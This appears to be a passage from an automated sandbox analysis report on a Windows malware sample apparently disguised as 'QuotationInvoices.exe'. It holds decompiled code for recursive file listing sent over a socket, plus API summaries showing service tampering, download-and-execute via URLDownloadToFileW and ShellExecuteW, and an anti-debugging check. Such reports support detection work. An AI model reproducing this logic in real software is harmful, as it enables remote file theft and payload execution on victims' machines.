				_t111 = E00402217(_t278 + 0x20, _t278 - 0x34);
				L00407DEE(_t278 - 0x3c,  *((intOrPtr*)(E00402254(_t278 + 0x20, _t278 - 0x38))),  *_t111,  *_t109);
				_t283 = _t282 + 0xc;
				_t255 = _t278 + 8;
				_t272 = FindFirstFileW(L00401E4F(E0040708E(_t278 - 0x6c, _t278 + 8, _t290, "*")), _t278 - 0x304);
				 *(_t278 - 0x1c) = _t272;
				L00401E54();
				_t290 = _t272 - 0xffffffff;
				if(_t272 != 0xffffffff) {
					goto L7;
				} else {
					_t282 = _t283 - 0x18;
					L00401FCE(_t185, _t282, 0x45e65c);
					_push(0x65);
					L00404CC1(L0040495D(_t185,  *(_t278 - 0x18) + 4, _t255, _t290),  *(_t278 - 0x18) + 4);
					 *((intOrPtr*)(_t278 - 0x24)) = 2;
					_push(0x467588);
					_t157 = _t278 - 0x24;
					goto L3;
				}
				while(1) {
					L7:
					_t121 = FindNextFileW(_t272, _t278 - 0x304);
					__eflags = _t121;
					if(_t121 == 0) {
						break;
					}
					_t185 =  *(_t278 - 0x18);
					__eflags =  *_t185;
					if( *_t185 == 0) {
						__eflags =  *(_t278 - 0x304) & 0x00000010;
						if(( *(_t278 - 0x304) & 0x00000010) == 0) {
							L31:
							E0040412C(_t185, _t278 - 0x84, _t278 - 0x2d8);
							_t265 = E00402254(_t278 - 0x84, _t278 - 0x3c);
							_t275 = E00402217(_t278 - 0x84, _t278 - 0x38);
							L00407DEE(_t278 - 0x30,  *((intOrPtr*)(E00402254(_t278 - 0x84, _t278 - 0x34))),  *_t139,  *_t137);
							_t283 = _t283 + 8;
							__eflags = L00407C70(_t278 - 0x84, _t278 + 0x20) - 0xffffffff;
							if(__eflags == 0) {
								L34:
								L00401E54();
								_t272 =  *(_t278 - 0x1c);
								continue;
							} else {
								L00401F1B(_t278 - 0x9c, _t255, _t275, L00401FF5(_t185, _t278 - 0x54, _t255, __eflags, _t278 - 0x304, 0x250));
								L00401F11();
								_t283 = _t283 - 0x18;
								_t255 = L00402ECA(_t185, _t278 - 0x54, L00416D80(_t185, _t278 - 0xb4, _t278 + 8), __eflags, 0x46b218);
								L00402ECA(_t185, _t283, _t152, __eflags, _t278 - 0x9c);
								_push(0x66);
								_t154 = L0040495D(_t185, _t185 + 4, _t152, __eflags);
								__eflags = _t154 - 0xffffffff;
								_t185 = _t185 & 0xffffff00 | _t154 == 0xffffffff;
								L00401F11();
								L00401F11();
								__eflags = _t185;
								if(_t185 == 0) {
									goto L34;
								} else {
									 *((intOrPtr*)(_t278 - 0x2c)) = 4;
									_push(0x467588);
									_t157 = _t278 - 0x2c;
									goto L3;
								}
							}
						} else {
							_t219 = ".";
							_t158 = _t278 - 0x2d8;
							while(1) {
								_t255 =  *_t158;
								__eflags = _t255 -  *_t219;
								if(_t255 !=  *_t219) {
									break;
								}
								__eflags = _t255;
								if(_t255 == 0) {
									L17:
									_t159 = 0;
								} else {
									_t255 =  *((intOrPtr*)(_t158 + 2));
									_t43 =  &(_t219[2]); // 0x2e0000
									__eflags = _t255 -  *_t43;
									if(_t255 !=  *_t43) {
										break;
									} else {
										_t158 = _t158 + 4;
										_t219 =  &(_t219[4]);
										__eflags = _t255;
										if(_t255 != 0) {
											continue;
										} else {
											goto L17;
										}
									}
								}
								L19:
								__eflags = _t159;
								if(_t159 == 0) {
									goto L31;
								} else {
									_t220 = L"..";
									_t160 = _t278 - 0x2d8;
									while(1) {
										_t255 =  *_t160;
										__eflags = _t255 -  *_t220;
										if(_t255 !=  *_t220) {
											break;
										}
										__eflags = _t255;
										if(_t255 == 0) {
											L25:
											_t161 = 0;
										} else {
											_t255 =  *((intOrPtr*)(_t160 + 2));
											_t46 =  &(_t220[2]); // 0x2e
											__eflags = _t255 -  *_t46;
											if(_t255 !=  *_t46) {
												break;
											} else {
												_t160 = _t160 + 4;
												_t220 =  &(_t220[4]);
												__eflags = _t255;
												if(_t255 != 0) {
													continue;
												} else {
													goto L25;
												}
											}
										}
										L27:
										__eflags = _t161;
										if(__eflags == 0) {
											goto L31;
										} else {
											_t255 = E004071A3(_t185, _t278 - 0xb4, _t278 + 8, __eflags, E0040412C(_t185, _t278 - 0x54, _t278 - 0x2d8));
											L00402F9A(_t185, _t278 - 0x6c, _t164, _t265, __eflags, "\\");
											L00401E54();
											L00401E54();
											_t286 = _t283 - 0x18;
											L00406E88(_t185, _t286, _t164, __eflags, _t278 + 0x20);
											_t283 = _t286 - 0x18;
											L00406E88(_t185, _t283, _t164, __eflags, _t278 - 0x6c);
											_t172 = L0040782F(_t185, _t164, __eflags);
											__eflags = _t172;
											if(_t172 != 0) {
												L00401E54();
												goto L31;
											} else {
												 *((intOrPtr*)(_t278 - 0x28)) = 3;
												_push(0x467588);
												_t157 = _t278 - 0x28;
												goto L3;
											}
										}
										goto L37;
									}
									asm("sbb eax, eax");
									_t161 = _t160 | 0x00000001;
									__eflags = _t161;
									goto L27;
								}
								goto L37;
							}
							asm("sbb eax, eax");
							_t159 = _t158 | 0x00000001;
							__eflags = _t159;
							goto L19;
						}
						L37:
						L00401F11();
						L00401E54();
						L00401E54();
						L00401F11();
						_t133 = L00401F11();
						 *[fs:0x0] =  *((intOrPtr*)(_t278 - 0xc));
						return _t133;
					} else {
						_t127 = FindClose(_t272);
						_t205 = _t185 + 4;
					}
					L10:
					L00404CC1(_t127, _t205);
					goto L37;
				}
				 *(_t278 - 4) =  *(_t278 - 4) | 0xffffffff;
				FindClose(_t272);
				_t266 =  *(_t278 - 0x18);
				L00402ECA(_t185, _t283 - 0x18, E0040704B(_t278 - 0x54, _t278 + 0x38, 0x46b218), __eflags, _t278 + 0x50);
				_push(0x67);
				L0040495D(_t185, _t266 + 4, _t124, __eflags);
				_t127 = L00401F11();
				_t205 = _t266 + 4;
				goto L10;
			}

0x004073c8
0x004073c8
0x004073cd
0x004073d2
0x004073db
0x004073de
0x004073e0
0x004073e9
0x004073ee
0x004073f2
0x004073f5
0x004073f9
0x004073fe
0x00407403
0x0040740d
0x0040740e
0x0040740f
0x00407410
0x00407413
0x00407418
0x0040741a
0x004077ca
0x004077cc
0x00000000
0x00407420
0x00407420
0x0040743e
0x00407444
0x00407450
0x00407456
0x0040745b
0x0040745d
0x00407465
0x0040746a
0x00407471
0x00407476
0x00407479
0x00407479
0x0040747a
0x0040747a
0x0040747a
0x0040745d
0x0040748b
0x00407494
0x004074b0
0x004074b5
0x004074c4
0x004074de
0x004074e0
0x004074e6
0x004074eb
0x004074ee
0x00000000
0x004074f0
0x004074f0
0x004074fa
0x004074ff
0x0040750f
0x00407514
0x0040751b
0x00407520
0x00000000
0x00407520
0x00407528
0x00407528
0x00407530
0x00407536
0x00407538
0x00000000
0x00000000
0x0040753e
0x00407541
0x00407544
0x0040755a
0x00407561
0x00407668
0x00407675
0x00407689
0x0040769a
0x004076b4
0x004076b9
0x004076cb
0x004076ce
0x0040776b
0x00407771
0x00407776
0x00000000
0x004076d4
0x004076ef
0x004076f7
0x004076fc
0x00407726
0x0040772a
0x00407730
0x00407735
0x0040773a
0x0040773d
0x00407743
0x0040774e
0x00407753
0x00407755
0x00000000
0x00407757
0x00407757
0x0040775e
0x00407763
0x00000000
0x00407763
0x00407755
0x00407567
0x00407567
0x0040756c
0x00407572
0x00407572
0x00407575
0x00407578
0x00000000
0x00000000
0x0040757a
0x0040757d
0x00407594
0x00407594
0x0040757f
0x0040757f
0x00407583
0x00407583
0x00407587
0x00000000
0x00407589
0x00407589
0x0040758c
0x0040758f
0x00407592
0x00000000
0x00000000
0x00000000
0x00000000
0x00407592
0x00407587
0x0040759d
0x0040759d
0x0040759f
0x00000000
0x004075a5
0x004075a5
0x004075aa
0x004075b0
0x004075b0
0x004075b3
0x004075b6
0x00000000
0x00000000
0x004075b8
0x004075bb
0x004075d2
0x004075d2
0x004075bd
0x004075bd
0x004075c1
0x004075c1
0x004075c5
0x00000000
0x004075c7
0x004075c7
0x004075ca
0x004075cd
0x004075d0
0x00000000
0x00000000
0x00000000
0x00000000
0x004075d0
0x004075c5
0x004075db
0x004075db
0x004075dd
0x00000000
0x004075e3
0x00407607
0x0040760c
0x00407618
0x00407620
0x00407625
0x0040762e
0x00407633
0x0040763c
0x00407643
0x00407648
0x0040764a
0x00407663
0x00000000
0x0040764c
0x0040764c
0x00407653
0x00407658
0x00000000
0x00407658
0x0040764a
0x00000000
0x004075dd
0x004075d6
0x004075d8
0x004075d8
0x00000000
0x004075d8
0x00000000
0x0040759f
0x00407598
0x0040759a
0x0040759a
0x00000000
0x0040759a
0x004077f1
0x004077f7
0x004077ff
0x00407807
0x0040780f
0x00407817
0x0040781f
0x0040782c
0x00407546
0x00407547
0x0040754d
0x0040754d
0x00407550
0x00407550
0x00000000
0x00407550
0x0040777e
0x00407783
0x00407789
0x004077aa
0x004077b0
0x004077b5
0x004077bd
0x004077c2
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004073CD

Part of subcall function 004048C2: connect.WS2_32(FFFFFFFF,0046B120,00000010), ref: 004048DD

Part of subcall function 0040495D: send.WS2_32(?,00000000,00000000,00000000), ref: 004049D0

__CxxThrowException@8.LIBVCRUNTIME ref: 0040747A
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 004074D8
FindNextFileW.KERNEL32(00000000,?), ref: 00407530
FindClose.KERNEL32(000000FF), ref: 00407547

Part of subcall function 00404CC1: closesocket.WS2_32(?), ref: 00404CC7

FindClose.KERNEL32(00000000), ref: 00407783

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
String ID:
API String ID: 2104358809-0
Opcode ID: d207ad929721cd855edbb2eb5cf3dc4e249b9e4bed7ae53f77ce28710262d3bd
Instruction ID: 167131e488ef2c307ef184c60b2d106dbef045888b7c46aae0330a731d497874
Opcode Fuzzy Hash: d207ad929721cd855edbb2eb5cf3dc4e249b9e4bed7ae53f77ce28710262d3bd
Instruction Fuzzy Hash: EBC190719041099ACB14FBA0CD52AEE7775AF10318F50417FE906B71E2EF38AE49CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00416026, Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00415785), ref: 00416036
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00415785), ref: 0041604A
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415785), ref: 00416057
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00415785), ref: 0041608C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415785), ref: 0041609E
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415785), ref: 004160A1

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: c65507853866108947a76fcc557e109169c4746ecafc9ab2ab6458b795b5b9f3
Instruction ID: b1b5d7cce16cb7d4f6f7d06f65ea92743a4bdfe8615a9dd2db5adb69e731dbbd
Opcode Fuzzy Hash: c65507853866108947a76fcc557e109169c4746ecafc9ab2ab6458b795b5b9f3
Instruction Fuzzy Hash: A90149311452147AD6119B389D4EEBF3F6CDB46B70F01032BF625922D2DAA8CD45C1A9

Uniqueness

Uniqueness Score: -1.00%

Function 00415DF3, Relevance: 9.0, APIs: 6, Instructions: 42serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,00415A79), ref: 00415DFF
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00415A79), ref: 00415E13
CloseServiceHandle.ADVAPI32(00000000,?,?,00415A79), ref: 00415E20
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00415A79), ref: 00415E2B
CloseServiceHandle.ADVAPI32(00000000,?,?,00415A79), ref: 00415E3D
CloseServiceHandle.ADVAPI32(00000000,?,?,00415A79), ref: 00415E40

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 2e4148de10c0f783cf708faa6a5c290779c0d98731dbcf563487ac9424c8f2d9
Instruction ID: b19b64aa54085c96ad2dd84e22caf5fef11378ad35cfc9ff3d0ac912cd913def
Opcode Fuzzy Hash: 2e4148de10c0f783cf708faa6a5c290779c0d98731dbcf563487ac9424c8f2d9
Instruction Fuzzy Hash: 85F0B432442318BFE2016B25EC88DFF3B6CDB86BA5B000027F90592191DAB8CD46D5B9

Uniqueness

Uniqueness Score: -1.00%

Function 00448638, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00440492: GetLastError.KERNEL32(?,?,00434BF5,?,00000000,?,004362D0,?,00000000,?,00000000), ref: 00440496
Part of subcall function 00440492: _free.LIBCMT ref: 004404C9
Part of subcall function 00440492: SetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 0044050A
Part of subcall function 00440492: _abort.LIBCMT ref: 00440510

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0043CCA5,?,?,?,?,0043C6FC,?,00000004), ref: 0044871A
_wcschr.LIBVCRUNTIME ref: 004487AA
_wcschr.LIBVCRUNTIME ref: 004487B8
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0043CCA5,00000000,0043CDC5), ref: 0044885B

Strings

\^)|/, xrefs: 00448812

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: \^)|/
API String ID: 4212172061-265608074
Opcode ID: 96d00d761d5436e66d989ff03b804d39ce6b28074fc91e60429bafa4e7402edc
Instruction ID: ef3e7cae020718206c0cf268bb8e93499443dccba40ca772c64b87621c202380
Opcode Fuzzy Hash: 96d00d761d5436e66d989ff03b804d39ce6b28074fc91e60429bafa4e7402edc
Instruction Fuzzy Hash: 39610B71500206AAFB25AB76CC42A6F7798EF04744F25442FFA05D7681EF78E900876D

Uniqueness

Uniqueness Score: -1.00%

Function 00448D9C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004490BB,?,00000000), ref: 00448E35
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004490BB,?,00000000), ref: 00448E5E
GetACP.KERNEL32(?,?,004490BB,?,00000000), ref: 00448E73

Strings

OCP, xrefs: 00448DF0
ACP, xrefs: 00448DBA

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ec727945837d45ce0baacd67a8ca90aafcf7502064084b7ac565c4f8fd353679
Instruction ID: 290c9b562341408f3b6dc968b5b43758406de560b8915f6cbe87f2d537113399
Opcode Fuzzy Hash: ec727945837d45ce0baacd67a8ca90aafcf7502064084b7ac565c4f8fd353679
Instruction Fuzzy Hash: E621D362B00100ABF7359F14C901AAF73A6AF64F51B66846FE909D7340EF3ADD41C358

Uniqueness

Uniqueness Score: -1.00%

Function 0040D246, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 0040D254
LoadResource.KERNEL32(00000000,00000000,?,?,00000000,0040CE15,?,?,00000000), ref: 0040D25F
LockResource.KERNEL32(00000000,?,?,00000000,0040CE15,?,?,00000000), ref: 0040D266
SizeofResource.KERNEL32(00000000,00000000,?,?,00000000,0040CE15,?,?,00000000), ref: 0040D271

Strings

SETTINGS, xrefs: 0040D24B

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 00deff0c68466a575a0ebeafedc501b9035721859b24099f6c81fc1f0d41a7a4
Instruction ID: 7dde8f8636903e0ff608f78ecd08f9ba817761ef5a5410671d73f75c8e0319a4
Opcode Fuzzy Hash: 00deff0c68466a575a0ebeafedc501b9035721859b24099f6c81fc1f0d41a7a4
Instruction Fuzzy Hash: 66E0EC72742350BBD66017A16D4DF4B6A68DB86F63F100036F701CA1E1C6F58800C765

Uniqueness

Uniqueness Score: -1.00%

Function 0040782F, Relevance: 7.7, APIs: 5, Instructions: 245fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00407834

Part of subcall function 0040708E: char_traits.LIBCPMT ref: 004070A9

FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004078AC
FindNextFileW.KERNEL32(00000000,?), ref: 004078D5
FindClose.KERNEL32(000000FF), ref: 004078EC

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNextchar_traits
String ID:
API String ID: 3260228402-0
Opcode ID: 2b3d2a962f84fa5c17ce0748f7f514119e1eda3bca051f46d98703d77d5bccb8
Instruction ID: 5aaf6a9ebe984de6bf2719c709ae27b9a56fb412b17db2879f6c861ebbd48fb3
Opcode Fuzzy Hash: 2b3d2a962f84fa5c17ce0748f7f514119e1eda3bca051f46d98703d77d5bccb8
Instruction Fuzzy Hash: 6E9160729040099ADB15FBA1CC91AEEB374AF50318F50417FE906B71E1EB386F49CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00448A23, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00440492: GetLastError.KERNEL32(?,?,00434BF5,?,00000000,?,004362D0,?,00000000,?,00000000), ref: 00440496
Part of subcall function 00440492: _free.LIBCMT ref: 004404C9
Part of subcall function 00440492: SetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 0044050A
Part of subcall function 00440492: _abort.LIBCMT ref: 00440510

Part of subcall function 00440492: _free.LIBCMT ref: 004404F1
Part of subcall function 00440492: SetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 004404FE

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00448A77
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00448AC8
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00448B88

Strings

\^)|/, xrefs: 00448A2E

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID: \^)|/
API String ID: 2829624132-265608074
Opcode ID: a1c1c2d4762ec121cd4e80a908aa80031870027a12ba70ec65ab6057cff46566
Instruction ID: 771d63a44eab1158043c8e1083f8a5d9fe3d0ea3981c1d4e449494b5d209e6b6
Opcode Fuzzy Hash: a1c1c2d4762ec121cd4e80a908aa80031870027a12ba70ec65ab6057cff46566
Instruction Fuzzy Hash: 81619DB15002179FFF289F24CC82B7A77A8EF04344F1044AFE905D6685EB78E951CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00411EA6, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115filenetworkCOMMON

Download Yara Rule

APIs

URLDownloadToFileW.URLMON(00000000,00000000,?,00000000,00000000), ref: 00411F37
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00411F74

Strings

C:\Users\user\Desktop\QuotationInvoices.exe, xrefs: 00411FE1
open, xrefs: 00411F6E

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Users\user\Desktop\QuotationInvoices.exe$open
API String ID: 2825088817-90626275
Opcode ID: 10b38b2891299db91c6839197edacd205694919ce2443da2a419d3de3235cde3
Instruction ID: fc15d3cd21884f35d49323b076505f205441e7cf9561e3ec0e02b0d255236edf
Opcode Fuzzy Hash: 10b38b2891299db91c6839197edacd205694919ce2443da2a419d3de3235cde3
Instruction Fuzzy Hash: AE316F716083405BCB14FB72D9529EF73A5AFD0708F00083FB982671E2EE7CAD49865A

Uniqueness

Uniqueness Score: -1.00%

Function 00435E43, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00435F3B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00435F45
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00435F52

Strings

\^)|/, xrefs: 00435E4E

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: \^)|/
API String ID: 3906539128-265608074
Opcode ID: f9c67f2c0bdda6ddb7a63e9934fdfd609bb9fa7fb886d00d99c197bf56bae116
Instruction ID: e15b25f5a5b7d34739447684302fdc39be5002eb4e397b296a667c6249b01064
Opcode Fuzzy Hash: f9c67f2c0bdda6ddb7a63e9934fdfd609bb9fa7fb886d00d99c197bf56bae116
Instruction Fuzzy Hash: C631F675901228ABCB21DF65DD8979DB7B8BF08310F5041EAE40CA7261E7749F818F49

Uniqueness

Uniqueness Score: -1.00%

Function 00440B6A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043C6FC,?,00000004), ref: 00440BBD

Strings

@, xrefs: 00440BA8
GetLocaleInfoEx, xrefs: 00440B85
\^)|/, xrefs: 00440B70

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx$\^)|/$@
API String ID: 2299586839-879744543
Opcode ID: 8219672d26f18dedf40cffa9430f6a91865f1c53cd90f6a2749fbfff6ece7a34
Instruction ID: 99bae646af06b01d05cc7b23da665a3c0ec0d7a5fd85ee0ca902cbe8b9f068d6
Opcode Fuzzy Hash: 8219672d26f18dedf40cffa9430f6a91865f1c53cd90f6a2749fbfff6ece7a34
Instruction Fuzzy Hash: BCF0F631641318BBDF21AF51DC02F6E7B64EF04B41F50006EFD0526292CEB59E24DA9D

Uniqueness

Uniqueness Score: -1.00%

Function 004451D9, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004451D9(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E0043DAF9(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = L0044BF69(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E00445418(_a16, __eflags, _t111);
							L0043E9A5(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = L0044BF69(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0043603A();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x46900c; // 0x7c295e5c
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = L0044E860(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								L004315B0(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E004451D9(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E0044E480(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E00445031);
									}
								} else {
									_push(_t55);
									_t57 = E004451D9(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
